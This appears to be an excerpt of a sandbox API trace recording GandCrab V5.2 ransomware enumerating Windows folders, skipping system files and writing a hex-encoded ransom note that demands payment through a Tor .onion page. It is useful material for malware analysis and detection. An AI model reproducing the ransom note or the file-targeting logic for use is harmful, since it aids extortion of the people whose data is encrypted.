hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.600] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0067.600] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0067.600] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="MSBuild" | out: lpString1="C:\\Program Files (x86)\\MSBuild") returned="C:\\Program Files (x86)\\MSBuild" [0067.600] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.600] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0067.600] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0067.600] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Reference Assemblies" | out: lpString1="C:\\Program Files (x86)\\Reference Assemblies") returned="C:\\Program Files (x86)\\Reference Assemblies" [0067.600] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.600] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.600] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.600] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt") returned="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt" [0067.600] lstrlenW (lpString=".titwmvjl") returned 9 [0067.600] lstrlenW (lpString="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt") returned 43 [0067.600] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.600] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 52 [0067.600] lstrlenW (lpString="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt") returned 43 [0067.600] lstrlenW (lpString=".txt") returned 4 [0067.600] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.603] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.603] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.603] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.604] lstrlenW (lpString="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt") returned 43 [0067.604] lstrlenW (lpString="C:\\Program Files (x86)\\TITWMVJL-DECRYPT.txt") returned 43 [0067.604] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.606] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.606] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.606] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.606] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0067.607] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Defender" | out: lpString1="C:\\Program Files (x86)\\Windows Defender") returned="C:\\Program Files (x86)\\Windows Defender" [0067.607] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.607] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0067.607] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Mail" | out: lpString1="C:\\Program Files (x86)\\Windows Mail") returned="C:\\Program Files (x86)\\Windows Mail" [0067.607] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.607] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0067.607] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Media Player" | out: lpString1="C:\\Program Files (x86)\\Windows Media Player") returned="C:\\Program Files (x86)\\Windows Media Player" [0067.607] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.607] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows Multimedia Platform", lpString2="..") returned 1 [0067.607] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Multimedia Platform" | out: lpString1="C:\\Program Files (x86)\\Windows Multimedia Platform") returned="C:\\Program Files (x86)\\Windows Multimedia Platform" [0067.607] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.607] lstrcmpW (lpString1="Windows NT", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows NT", lpString2="..") returned 1 [0067.607] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows NT" | out: lpString1="C:\\Program Files (x86)\\Windows NT") returned="C:\\Program Files (x86)\\Windows NT" [0067.607] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.607] lstrcmpW (lpString1="Windows Photo Viewer", lpString2=".") returned 1 [0067.607] lstrcmpW (lpString1="Windows Photo Viewer", lpString2="..") returned 1 [0067.608] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Photo Viewer" | out: lpString1="C:\\Program Files (x86)\\Windows Photo Viewer") returned="C:\\Program Files (x86)\\Windows Photo Viewer" [0067.608] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.608] lstrcmpW (lpString1="Windows Portable Devices", lpString2=".") returned 1 [0067.608] lstrcmpW (lpString1="Windows Portable Devices", lpString2="..") returned 1 [0067.608] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Portable Devices" | out: lpString1="C:\\Program Files (x86)\\Windows Portable Devices") returned="C:\\Program Files (x86)\\Windows Portable Devices" [0067.608] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.608] lstrcmpW (lpString1="Windows Sidebar", lpString2=".") returned 1 [0067.608] lstrcmpW (lpString1="Windows Sidebar", lpString2="..") returned 1 [0067.608] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="Windows Sidebar" | out: lpString1="C:\\Program Files (x86)\\Windows Sidebar") returned="C:\\Program Files (x86)\\Windows Sidebar" [0067.608] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.608] lstrcmpW (lpString1="WindowsPowerShell", lpString2=".") returned 1 [0067.608] lstrcmpW (lpString1="WindowsPowerShell", lpString2="..") returned 1 [0067.608] lstrcatW (in: lpString1="C:\\Program Files (x86)\\", lpString2="WindowsPowerShell" | out: lpString1="C:\\Program Files (x86)\\WindowsPowerShell") returned="C:\\Program Files (x86)\\WindowsPowerShell" [0067.608] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0067.608] FindClose (in: hFindFile=0x4c9d38 | out: hFindFile=0x4c9d38) returned 1 [0067.609] CloseHandle (hObject=0x218) returned 1 [0067.609] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.609] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0067.609] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0067.609] lstrcatW (in: lpString1="C:\\", lpString2="ProgramData" | out: lpString1="C:\\ProgramData") returned="C:\\ProgramData" [0067.609] lstrcatW (in: lpString1="C:\\ProgramData", lpString2="\\" | out: lpString1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0067.610] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.610] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.610] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.610] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0067.610] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0067.610] lstrcatW (in: lpString1="C:\\", lpString2="Recovery" | out: lpString1="C:\\Recovery") returned="C:\\Recovery" [0067.610] lstrcatW (in: lpString1="C:\\Recovery", lpString2="\\" | out: lpString1="C:\\Recovery\\") returned="C:\\Recovery\\" [0067.610] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.611] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.611] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.611] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.612] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.612] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Recovery\\\\TITWMVJL-DECRYPT.txt") returned 33 [0067.612] CreateFileW (lpFileName="C:\\Recovery\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\recovery\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.612] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x